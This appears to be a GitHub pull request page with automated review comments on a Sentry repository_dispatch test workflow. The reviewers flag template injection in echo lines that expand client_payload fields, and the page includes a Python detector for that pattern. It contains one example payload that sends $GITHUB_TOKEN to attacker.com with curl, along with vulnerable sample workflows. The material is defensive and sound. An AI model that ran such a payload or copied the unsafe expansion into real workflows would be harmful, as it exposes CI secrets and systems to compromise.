[Common] sentry dispatch test #1274
Walkthrough: Adds a GitHub Actions workflow that handles the sentry-error type of the repository_dispatch event. The main fields of the Sentry payload are verified via standard output.
Changes: Sentry dispatch test workflow
Estimated code review effort: 🎯 1 (Simple) | ⏱️ ~5 minutes
🚥 Pre-merge checks: 5 passed
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/sentry-dispatch-test.yml:
- Around line 14-19: The echo lines directly expand github.event.client_payload
fields into the shell, allowing command injection; instead set those values into
GitHub Actions environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL,
ENVIRONMENT, LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 3b32a9b1-94ea-4ed0-bb0a-914340ab2d5d
📒 Files selected for processing (1)
.github/workflows/sentry-dispatch-test.yml
echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
echo "Title: ${{ github.event.client_payload.title }}"
echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
echo "Environment: ${{ github.event.client_payload.environment }}"
echo "Level: ${{ github.event.client_payload.level }}"
echo "Project: ${{ github.event.client_payload.project }}"
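Review bot: each of these six echo lines puts a `${{ github.event.client_payload.* }}` expression inside a `run:` script, so the runner substitutes the payload text into the script before bash parses it; the surrounding double quotes cannot protect anything because they are part of the text being substituted into. Move each value into the step's `env:` block and reference it as `"$ISSUE_ID"`, `"$TITLE"` and so on. Since the Precaution section says the payload will be forwarded by a webhook receiver in front of Sentry, treat `title` in particular as untrusted: Sentry issue titles are derived from exception messages, which routinely carry application input.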
Template injection vulnerability: do not expand client_payload directly into shell commands.
Expanding client_payload values sent from an external webhook receiver directly into shell commands (${{ }}) makes the workflow vulnerable to command injection attacks. If a malicious payload contains shell metacharacters (;, $(), `, etc.), arbitrary code can be executed.
For example, if the title field contains a value such as "; curl http://attacker.com?token=$GITHUB_TOKEN; echo ", sensitive information could be leaked or the CI environment compromised.
🔒 Recommended fix: pass the values safely through environment variables
steps:
- name: Print Sentry payload
+ env:
+ ISSUE_ID: ${{ github.event.client_payload.issue_id }}
+ TITLE: ${{ github.event.client_payload.title }}
+ SENTRY_URL: ${{ github.event.client_payload.sentry_url }}
+ ENVIRONMENT: ${{ github.event.client_payload.environment }}
+ LEVEL: ${{ github.event.client_payload.level }}
+ PROJECT: ${{ github.event.client_payload.project }}
run: |
- echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
- echo "Title: ${{ github.event.client_payload.title }}"
- echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
- echo "Environment: ${{ github.event.client_payload.environment }}"
- echo "Level: ${{ github.event.client_payload.level }}"
- echo "Project: ${{ github.event.client_payload.project }}"
+ echo "Issue ID: $ISSUE_ID"
+ echo "Title: $TITLE"
+ echo "Sentry URL: $SENTRY_URL"
+ echo "Environment: $ENVIRONMENT"
+ echo "Level: $LEVEL"
+ echo "Project: $PROJECT"
When the values are set as environment variables, GitHub Actions handles escaping automatically, so injection attacks can be prevented.
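Review bot: the `env:` mapping in this hunk is the right shape; the alternative phrased in the agent prompt above (echo "ISSUE_ID=${{ github.event.client_payload.issue_id }}" >> $GITHUB_ENV) should not be used instead, because that echo is itself a `run:` line with the payload expanded into it, and a payload value containing a newline could also append further KEY=VALUE entries to $GITHUB_ENV. Keeping the values in `env:` avoids both, since the runner sets them directly as process environment without a shell in between. The closing sentence of this comment should say so rather than speak of "escaping": nothing is escaped, the value simply never passes through the shell as code.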
🧰 Tools
🪛 zizmor (1.25.2)
[error] 14-14: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 15-15: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 16-16: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 17-17: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 18-18: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 19-19: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
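The zizmor findings above come from a full workflow linter. As an added example (not code from this PR, from CodeRabbit or from zizmor), the following Python script is a minimal, line-based detector for the same template-injection pattern: it walks a workflow file, tracks `run:` scripts, and reports every `${{ ... }}` expression inside them whose context is on a short list of externally controlled sources, with `github.event.client_payload.*` from this PR's workflow first on the list. The list of untrusted contexts and the two embedded sample workflows are constructed for this example; the vulnerable sample mirrors the six echo lines flagged above plus an inline `run:` variant, and the hardened sample uses the `env:` mapping from the suggested fix.

```python
import re
from dataclasses import dataclass
from typing import List

# Expression contexts whose values come from outside the repository. The list
# is an assumption for this example (zizmor carries a far more complete one);
# the repository_dispatch payload from the PR above is the first entry.
UNTRUSTED_CONTEXTS = (
    "github.event.client_payload.",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.comment.body",
    "github.head_ref",
)

# `${{ expr }}` as the runner substitutes it, before the shell ever sees the line.
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
# A `run:` key, optionally as the first key of a list item (`- run:`).
RUN_KEY_RE = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


@dataclass
class Finding:
    line_no: int      # 1-based line in the workflow text
    expression: str   # the expression inside ${{ }}


def _untrusted_expressions(line: str) -> List[str]:
    """Every ${{ }} expression on the line that starts with an untrusted context."""
    return [
        m.group(1) for m in EXPR_RE.finditer(line)
        if m.group(1).startswith(UNTRUSTED_CONTEXTS)
    ]


def scan_workflow(text: str) -> List[Finding]:
    """Flag untrusted expressions expanded inside `run:` scripts.

    Line-based approximation of the YAML structure: `run: |` / `run: >` opens a
    block scalar whose body is every following non-blank line indented deeper
    than the `run` key; `run: <command>` is checked inline. Expressions in
    `env:` mappings are deliberately not flagged, because the runner sets those
    as process environment without passing them through a shell.
    """
    findings: List[Finding] = []
    block_indent = None  # indent of the open `run` key, or None outside a block

    for line_no, line in enumerate(text.splitlines(), start=1):
        if block_indent is not None:
            if not line.strip():
                continue  # blank lines do not end a block scalar
            if len(line) - len(line.lstrip(" ")) > block_indent:
                for expr in _untrusted_expressions(line):
                    findings.append(Finding(line_no, expr))
                continue
            block_indent = None  # dedent: the script has ended

        m = RUN_KEY_RE.match(line)
        if not m:
            continue
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        value = m.group(3)
        if value.startswith(("|", ">")):
            block_indent = key_indent
        else:
            for expr in _untrusted_expressions(value):
                findings.append(Finding(line_no, expr))
    return findings


# Constructed sample: the pattern flagged in the PR, plus an inline `run:` variant.
VULNERABLE_WORKFLOW = """\
name: sentry-dispatch-test
on:
  repository_dispatch:
    types: [sentry-error]
jobs:
  print:
    runs-on: ubuntu-latest
    steps:
      - name: Print Sentry payload
        run: |
          echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
          echo "Title: ${{ github.event.client_payload.title }}"
          echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
          echo "Environment: ${{ github.event.client_payload.environment }}"
          echo "Level: ${{ github.event.client_payload.level }}"
          echo "Project: ${{ github.event.client_payload.project }}"
      - name: Inline form is just as exposed
        run: echo "Project ${{ github.event.client_payload.project }} ok"
"""

# Constructed sample: the same step after the suggested `env:` fix.
SAFE_WORKFLOW = """\
steps:
  - name: Print Sentry payload
    env:
      ISSUE_ID: ${{ github.event.client_payload.issue_id }}
      TITLE: ${{ github.event.client_payload.title }}
    run: |
      echo "Issue ID: $ISSUE_ID"
      echo "Title: $TITLE"
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", SAFE_WORKFLOW)):
        found = scan_workflow(wf)
        print(f"{label}: {len(found)} finding(s)")
        for f in found:
            print(f"  line {f.line_no}: ${{{{ {f.expression} }}}} expanded inside run:")
```

Run it as a script and it reports seven findings for the vulnerable sample (the six block-scalar lines and the inline one) and none for the hardened sample, even though the hardened sample still contains the same expressions, now in `env:` where they are harmless. The block-scalar handling is intentionally simple (a dedent ends the script); a production check should parse the YAML properly, which is why the real linters exist.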
Source: Linters/SAST tools
What is this PR? 🔍
Changes 📝
- Add a test workflow to check whether GitHub Actions runs when repository_dispatch is called
- Print the client_payload fields when a sentry-error type event is received
ScreenShot 📷
N/A
Precaution
A receiver server for the webhook requests still needs to be added
✔️ Please check if the PR fulfills these requirements
- develop branch unconditionally?
- main?
- yarn lint
Summary by CodeRabbit
Release notes